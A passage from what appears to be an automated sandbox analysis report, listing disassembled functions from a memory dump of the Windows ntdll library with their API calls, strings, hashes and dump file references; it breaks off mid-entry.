Part of subcall function 6AB70315: memcpy.1105(?,?,?,?,0000FFFF,?,00000000,00000000,000000FF,?,?,6AB70254,6AC3F868,00000038,6AB6F563), ref: 6AB7042B

RtlActivateActivationContextUnsafeFast.1105 ref: 6AB702BA

Strings

$, xrefs: 6AB7029C
LdrpProcessDetachNode, xrefs: 6ABC61D7
minkernel\ntdll\ldrsnap.c, xrefs: 6ABC61E1
Uninitializing DLL "%wZ" (Init routine: %p), xrefs: 6ABC61D0

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$ActivateActivationContextFastUnsafe
String ID: $$LdrpProcessDetachNode$Uninitializing DLL "%wZ" (Init routine: %p)$minkernel\ntdll\ldrsnap.c
API String ID: 2422247448-1066784428
Opcode ID: 66dc9788d680a5d854b5b144d81270a9b6196b76fb727502feffe025d9568349
Instruction ID: 247f8e887b2deb518873773e5c59fd8cbae60dc9350dc894de04295fa03a537f
Opcode Fuzzy Hash: 66dc9788d680a5d854b5b144d81270a9b6196b76fb727502feffe025d9568349
Instruction Fuzzy Hash: BB31B171D02284DBDB21CF68C988A9EBBB0FF09304F11419AD410AF284DFB2DA41EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB70C30, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockShared.1105(6AC58550,?,?,00000000,000000FF,6AC3F868,00000038,6AB6F563), ref: 6AB70C6F
RtlReleaseSRWLockShared.1105(6AC58550,6AC58550,?,?,00000000,000000FF,6AC3F868,00000038,6AB6F563), ref: 6AB70C98

Strings

Calling TLS callback %p for DLL "%wZ" at %p, xrefs: 6ABC642C
minkernel\ntdll\ldrtls.c, xrefs: 6ABC643D
LdrpCallTlsInitializers, xrefs: 6ABC6433

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: LockShared$AcquireRelease
String ID: Calling TLS callback %p for DLL "%wZ" at %p$LdrpCallTlsInitializers$minkernel\ntdll\ldrtls.c
API String ID: 2614130328-70613900
Opcode ID: 42529eefc5e4e34c1dbda9092f14a2cc78b9c01278b197321b09a94bf103882d
Instruction ID: 849a75ea187f81a2151fb73e1532684053c1e2e9feb21523c5af7528f7febdf7
Opcode Fuzzy Hash: 42529eefc5e4e34c1dbda9092f14a2cc78b9c01278b197321b09a94bf103882d
Instruction Fuzzy Hash: B221C1B1D00798ABDB20CF68C940F5EBBB4FB05724F12061AF92573281EB71AC50A7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6ABFFDDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,6ABBFA1C,00000000,00000004,?,00000000,?,00000000), ref: 6ABFFDFA
DbgPrintEx.1105(00000065,00000001,RTL: Enter CriticalSection Timeout (%I64u secs) %d,00000000,?,?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,6ABBFA1C,00000000), ref: 6ABFFE0A
DbgPrintEx.1105(00000065,00000000,RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u,?,?,00000002,?,00000000,00000004,?,00000000,?,00000000,00000000), ref: 6ABFFE34

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 6ABFFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 6ABFFE01

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 545360701-3903918235
Opcode ID: eef9710f49d40ebf3af03926895033a125d33d308fda78c6d4bc247be7a9335f
Instruction ID: bd4579de46d1a7b2f141f03f93c6dd65b0d3d04486ed5a59a73f25729673737e
Opcode Fuzzy Hash: eef9710f49d40ebf3af03926895033a125d33d308fda78c6d4bc247be7a9335f
Instruction Fuzzy Hash: 6DF0C236500181BBD6200A55DC05F27BF6AEB45730F194714F628565D2EE62B831A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61190, Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

RtlIpv4StringToAddressW.1105(00000000,?,?,00000000), ref: 6AB611B9

Part of subcall function 6AB611E0: iswctype.1105(0000000A,00000004), ref: 6AB61244

iswctype.1105(00000000,00000004,00000000,?,?,00000000), ref: 6ABBEB6B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: iswctype$AddressIpv4String
String ID:
API String ID: 1627499474-0
Opcode ID: fb804841babf00360943d9f994b3b33d5c73eef6988bae1e53c25cbdaf3f4e98
Instruction ID: fa6b0afc48f0ebc97df22be0ca2f997a930da827874d8a718942cce04f131d17
Opcode Fuzzy Hash: fb804841babf00360943d9f994b3b33d5c73eef6988bae1e53c25cbdaf3f4e98
Instruction Fuzzy Hash: B3414A36640295AAE728CA65EC81BBD73F4EF01764F254526F441D72D0EF38DA41F364

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9F296, Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 6AB9F2E0: RtlAcquireSRWLockExclusive.1105(6AC586AC,00000000,00000000,00000000,0000000C,?,6AB9F2BF,00000000,00000000,?), ref: 6AB9F2F1
Part of subcall function 6AB9F2E0: RtlReleaseSRWLockExclusive.1105(6AC586AC,?,?,6AC586AC,00000000,00000000,00000000,0000000C,?,6AB9F2BF,00000000,00000000,?), ref: 6AB9F31B

RtlAcquireSRWLockShared.1105(0000001C,00000000,00000000,?), ref: 6ABDBB5B
RtlReleaseSRWLockShared.1105(0000001C,0000001C,00000000,00000000,?), ref: 6ABDBBE9

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lock$AcquireExclusiveReleaseShared
String ID:
API String ID: 3474408661-0
Opcode ID: fe7e049e3f99765798973f8d4c615c9ad1b5fbcd5f9e49e5cb38ca0caee22365
Instruction ID: eb9719d89b3abbc23cf86dbc1d0cc9dfe82d9356c36ab4e38f3daf0ccf2ea17d
Opcode Fuzzy Hash: fe7e049e3f99765798973f8d4c615c9ad1b5fbcd5f9e49e5cb38ca0caee22365
Instruction Fuzzy Hash: 8E31F675D002949BCB10DF68C884BEDBBB4FF45318F1480A9E949AF247DF725A46EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB70541, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,000000AB,?,?,?,?,6AB704FB,6AC3F890,0000001C,6AB703A8,?,00000000), ref: 6AB70569
RtlInitUnicodeString.1105(?,VS_VERSION_INFO,00000020,0000005C,0000005C,00000010,00000000,00000010,?,00000001,?,00000010,?,00000010,?,00000010), ref: 6AB706E7
RtlCompareUnicodeString.1105(?,6AC3F890,00000000,6AB703A8,?,VS_VERSION_INFO,00000020,0000005C,0000005C,00000010,00000000,00000010,?,00000001,?,00000010), ref: 6AB70717

Part of subcall function 6AB79660: RtlCompareUnicodeStrings.1105(?,?,00000000,?,6AC57B60,?,6ABA68BE,?,00000024,00000001,?,6AB905B9,?,?,6AC57B60), ref: 6AB79680

Strings

VS_VERSION_INFO, xrefs: 6AB706DE

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Unicode$CompareString$HeaderImageInitStrings
String ID: VS_VERSION_INFO
API String ID: 1271209012-1537192461
Opcode ID: 4911065dc85803ac8f1e28c7e546de286651079f1a0d707a8157b7965a9155fa
Instruction ID: b5005338756daa243f4ae7eee5a87a2128ababb13f570fe83ff33e6a70dfa4af
Opcode Fuzzy Hash: 4911065dc85803ac8f1e28c7e546de286651079f1a0d707a8157b7965a9155fa
Instruction Fuzzy Hash: 4C51E331A002969AEB20CBB0CC40BAEB7B8EF14645F11456AD974DB1C3EFB1DA01EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61390, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 6AB61783: RtlAcquireSRWLockExclusive.1105(?,6AB613C0,6AC3F288,00000044), ref: 6AB61793

RtlReleaseSRWLockExclusive.1105(?,6AC3F288,00000044), ref: 6AB61462

Part of subcall function 6AB61986: RtlIsValidIndexHandle.1105(?,?,00000000,?,?,6AB613F2,6AC3F288,00000044), ref: 6AB61995

memcpy.1105(?,0000000E,?,6AC3F288,00000044), ref: 6AB6143D

Strings

#%u, xrefs: 6ABBEE91

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireHandleIndexReleaseValidmemcpy
String ID: #%u
API String ID: 1422088098-232158463
Opcode ID: 4b9727fa143a277e72045aa4d3eb165db5734097f87e59cd15fd79ec0186fe32
Instruction ID: 4fff7b6fd8d113e1b34733726fd2d700e53398242bd687549ce909ddba0cc664
Opcode Fuzzy Hash: 4b9727fa143a277e72045aa4d3eb165db5734097f87e59cd15fd79ec0186fe32
Instruction Fuzzy Hash: 7341E471A04295DFDB50CF98D840AAEB7B6EF86344F1A4069E814AB351DF71DC42EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB617B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,6AC3F2C8,00000018), ref: 6AB617D7
RtlGetIntegerAtom.1105(?,?,?,6AC3F2C8,00000018), ref: 6AB617F3

Part of subcall function 6AB6187D: _wcsicmp.1105(0000001C,?,?,?,00000000,?,?,?,?), ref: 6AB61921

RtlReleaseSRWLockExclusive.1105(?,?,?,?,6AC3F2C8,00000018), ref: 6AB6185D

Part of subcall function 6AB61986: RtlIsValidIndexHandle.1105(?,?,00000000,?,?,6AB613F2,6AC3F288,00000044), ref: 6AB61995

Strings

Atom, xrefs: 6AB617C7

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireAtomHandleIndexIntegerReleaseValid_wcsicmp
String ID: Atom
API String ID: 2453091922-2154973765
Opcode ID: 1bbd92d6247a397612c8e3caf14407fc249838f1854bf8c7ad0476b852a9f0c9
Instruction ID: bf33f316765f3dda31c9f55d3b1bc05fcb9e165c6a4909ca74c5d4cb37d864fb
Opcode Fuzzy Hash: 1bbd92d6247a397612c8e3caf14407fc249838f1854bf8c7ad0476b852a9f0c9
Instruction Fuzzy Hash: 1031B439D01295DBEB00CFA494546EEF7B5FF05744B0A516AD820AB240DF38CD02E7B5

Uniqueness

Uniqueness Score: -1.00%

Function 6AC240DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6AC40FE0), ref: 6AC24110

Strings

RtlSetUserValueHeap, xrefs: 6AC24127, 6AC24184

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: RtlSetUserValueHeap
API String ID: 3446177414-1142157168
Opcode ID: 0836038c1cc4bbd089a8aad54d1b9b67db296440341b6bd50423921e7bde6944
Instruction ID: b62c6f2b7fe0ac5d6b8afd92f39595f97c81900b1698667c69f98fd917b9f6c4
Opcode Fuzzy Hash: 0836038c1cc4bbd089a8aad54d1b9b67db296440341b6bd50423921e7bde6944
Instruction Fuzzy Hash: D6212534941298AFEF11CFB8CA047DEBFB2AF55358F058068E4446B282DF754A45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AC2387C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20), ref: 6AC238B3

Strings

RtlGetUserInfoHeap, xrefs: 6AC238CA, 6AC23927

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: RtlGetUserInfoHeap
API String ID: 3446177414-1656697243
Opcode ID: 3efa161fd89f325cb4741d8a7d39e39cf27311f186ed41f5fdb2bbf09dcddcf2
Instruction ID: 92aa143dd8fe2c9593f96f57e536a776297f3d7c351ea2dcf2834794da0af194
Opcode Fuzzy Hash: 3efa161fd89f325cb4741d8a7d39e39cf27311f186ed41f5fdb2bbf09dcddcf2
Instruction Fuzzy Hash: 5D21D634905398AFEF11DFB885047DEFFB1AF06314F048048E4846B292DF764A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC24212, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.1105(?,?,6AC579A0,6AC40EA8,00000024,6ABD6051,?,?,00000000,00000000,?,?,6AB93347,?,00000000,?), ref: 6AC2423F

Strings

RtlSizeHeap, xrefs: 6AC2425B, 6AC242B9

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: RtlSizeHeap
API String ID: 3446177414-202636049
Opcode ID: b13c185be9964a73b64de97c63f222c2298a3d0f034f976279056693a92047d2
Instruction ID: 905b3efefd8460253f488f7651953a51d55986a0d40db10e379869bbe2a0e45b
Opcode Fuzzy Hash: b13c185be9964a73b64de97c63f222c2298a3d0f034f976279056693a92047d2
Instruction Fuzzy Hash: AE210130911658ABEB10CBB9C6087DEBFF1AF45318F008248E45467292EFB54E45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE3E13, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

wcschr.1105(?,0000002C,?,?,00000000,?,?,6ABC060B), ref: 6ABE3E23
wcstoul.1105(-00000002,6ABC060B,00000010,?,?,00000000,?,?,6ABC060B), ref: 6ABE3E3D
DbgPrintEx.1105(00000055,00000003,CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X,?,?,00000000,?,?,6ABC060B), ref: 6ABE3E5A

Part of subcall function 6ABE3C93: wcschr.1105(?,0000003D,00000000,?), ref: 6ABE3CAC
Part of subcall function 6ABE3C93: RtlInitUnicodeString.1105(?,-00000002,00000000,?), ref: 6ABE3CD0
Part of subcall function 6ABE3C93: RtlAnsiStringToUnicodeString.1105(?,?,00000001,00000000,?), ref: 6ABE3D72
Part of subcall function 6ABE3C93: RtlCompareUnicodeString.1105(?,?,00000001,?,?,00000001,00000000,?), ref: 6ABE3D89
Part of subcall function 6ABE3C93: RtlFreeUnicodeString.1105(?,00000000,?), ref: 6ABE3DED

Strings

CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 6ABE3E51

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Unicode$wcschr$AnsiCompareFreeInitPrintwcstoul
String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X
API String ID: 2652356044-1863042022
Opcode ID: 717f0f650dd3b38e9f0aa88b610428268a53fd1821b0627d1a1599f45804caef
Instruction ID: 70913c1bb4e767d5f61eb6e4836ce74c740156bc90aa242fa01279f95b5840e9
Opcode Fuzzy Hash: 717f0f650dd3b38e9f0aa88b610428268a53fd1821b0627d1a1599f45804caef
Instruction Fuzzy Hash: 1FF02B3220024436E718525AEC4BEAF779CCF85AA0F16015DFA1C9B282EF61ED01A2F4

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61FA1, Relevance: 6.3, APIs: 4, Instructions: 266COMMON

Download Yara Rule

APIs

memcpy.1105(?,?,00000000,?,?,?), ref: 6AB620AB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 39fc4fbfabddd4e2283f73ad7f27329d614b1e68686adfbf1d623ce0ef6a66dc
Instruction ID: be9aaf1bdf579b37a6c6fd1ab69ad29d460070916a55b435ec9a0f542bb636f4
Opcode Fuzzy Hash: 39fc4fbfabddd4e2283f73ad7f27329d614b1e68686adfbf1d623ce0ef6a66dc
Instruction Fuzzy Hash: 41A18175E041999BEB24CA28C954BEA72F9FF44314F12C1E9D95993240EF31DA82EFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB611E0, Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

iswctype.1105(0000000A,00000004), ref: 6AB61244
iswctype.1105(00000000,00000004), ref: 6ABBEC6A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: iswctype
String ID:
API String ID: 304682654-0
Opcode ID: 175aeca0c71b424467d4f25fb354ec3260a2ffe8bf4f182db3133658e929ee88
Instruction ID: aeb08fa7e2e9fe3b316ad31a950430009eff69831a0863aee622bef092e969b1
Opcode Fuzzy Hash: 175aeca0c71b424467d4f25fb354ec3260a2ffe8bf4f182db3133658e929ee88
Instruction Fuzzy Hash: CA710171E0419A9BDB98CEA8E4906FEB3F1EB46300F15456AE851E7284DF38D944E770

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61E50, Relevance: 6.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.1105(C000000D,?,00000000,6AC3F330,00000018), ref: 6ABBF223
RtlNtStatusToDosError.1105(C000000D), ref: 6ABBF2A6
RtlEnterCriticalSection.1105(?), ref: 6ABBF2BB
RtlNtStatusToDosError.1105(C000000D), ref: 6ABBF2E2

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorStatus$CriticalEnterSection
String ID:
API String ID: 152543406-0
Opcode ID: 9b8050def3e3eb3de9cb8928e07696ff91e7d9ea59cf82768953c8c1c8114c94
Instruction ID: 9a909391f1a683305b6f126114ec0c2014f4db34096eb8eca25dc31fe2f79692
Opcode Fuzzy Hash: 9b8050def3e3eb3de9cb8928e07696ff91e7d9ea59cf82768953c8c1c8114c94
Instruction Fuzzy Hash: FF51F079A016C59FDB10CF68C594BBEBBE1EF49308F058569E865A7641CF34EC01EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC3ED52, Relevance: 6.1, APIs: 4, Instructions: 110timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC58684,6AC58668,?,?,6AC58668,6AC58668,?,6AC3E5F4,?,80000002,6AC58668,6AC58660), ref: 6AC3EDA9
RtlReleaseSRWLockExclusive.1105(6AC58684,6AC58684,6AC58668,?,?,6AC58668,6AC58668,?,6AC3E5F4,?,80000002,6AC58668,6AC58660), ref: 6AC3EE42
RtlDebugPrintTimes.1105(?,?,6AC58684,6AC58684,6AC58668,?,?,6AC58668,6AC58668,?,6AC3E5F4,?,80000002,6AC58668,6AC58660), ref: 6AC3EE50
RtlReleaseSRWLockExclusive.1105(6AC58684,6AC58684,6AC58668,?,?,6AC58668,6AC58668,?,6AC3E5F4,?,80000002,6AC58668,6AC58660), ref: 6AC3EE5B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$AcquireDebugPrintTimes
String ID:
API String ID: 309489879-0
Opcode ID: 10496b54d5a861abb78b383c1a706ddbd039119905f9f51cc6d837e2d7479241
Instruction ID: 1655c3fdcb64447c82769a07e1358767a3e67876d7a80eec8be7b71dde72d3eb
Opcode Fuzzy Hash: 10496b54d5a861abb78b383c1a706ddbd039119905f9f51cc6d837e2d7479241
Instruction Fuzzy Hash: 4B31C476A015359B8B19CE29C890569B7F5EF8A32031542ADE826DB395EF34ED41CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8ECE0, Relevance: 6.1, APIs: 4, Instructions: 103timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,00000000,00000000), ref: 6AB8ED2C
RtlReleaseSRWLockExclusive.1105(?,00000000,00000000,?,00000000,00000000), ref: 6AB8ED90
TpSetWaitEx.1105 ref: 6ABD42DE
RtlDebugPrintTimes.1105(?,?,00000000,00000000,?,00000000,00000000), ref: 6ABD432F

Part of subcall function 6AB8FC39: ZwAssociateWaitCompletionPacket.1105(?,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,00000000), ref: 6AB8FC71

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLockWait$AcquireAssociateCompletionDebugPacketPrintReleaseTimes
String ID:
API String ID: 1549838691-0
Opcode ID: 2abff878551cf659d9f2f2ec5e10fca4117c03cb08621f234c4e96935f00d08a
Instruction ID: 976b8eb95249ecac3427a63aaa31feae1cc04a562ad97e88af9e3746090af856
Opcode Fuzzy Hash: 2abff878551cf659d9f2f2ec5e10fca4117c03cb08621f234c4e96935f00d08a
Instruction Fuzzy Hash: D231D2B560579AABC710DF3CC84479EB7E4BF86714F010929E86887245DF30E824EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6AC1C08A, Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(00000180,?,?,?,00000001,00000000,00000000,?,6AC1BC33,?,00000001,00000020,?,?), ref: 6AC1C0CA
memcpy.1105(0000000C,?,?,00000000,?,?,?,?,?,00000001,00000000,00000000,?,6AC1BC33,?,00000001), ref: 6AC1C115
RtlReleaseSRWLockExclusive.1105(?,00000000,?,?,?,?,?,00000001,00000000,00000000,?,6AC1BC33,?,00000001,00000020,?), ref: 6AC1C17F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireReleasememcpy
String ID:
API String ID: 753335654-0
Opcode ID: 92e45560f4be350c7bdfdc471d1ed9244ffb2befdad43920ecaffdbc75b5eade
Instruction ID: fbe332f36e429210aef4b4f92f5dab83c819e8d08381952d86b032ec4ed9be99
Opcode Fuzzy Hash: 92e45560f4be350c7bdfdc471d1ed9244ffb2befdad43920ecaffdbc75b5eade
Instruction Fuzzy Hash: 1C31CF76A0C505ABC718CF68C880AEAB3F9FF44714B54C46DE85A9B201EB34FD52DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38050, Relevance: 6.1, APIs: 4, Instructions: 78threadCOMMON

Download Yara Rule

APIs

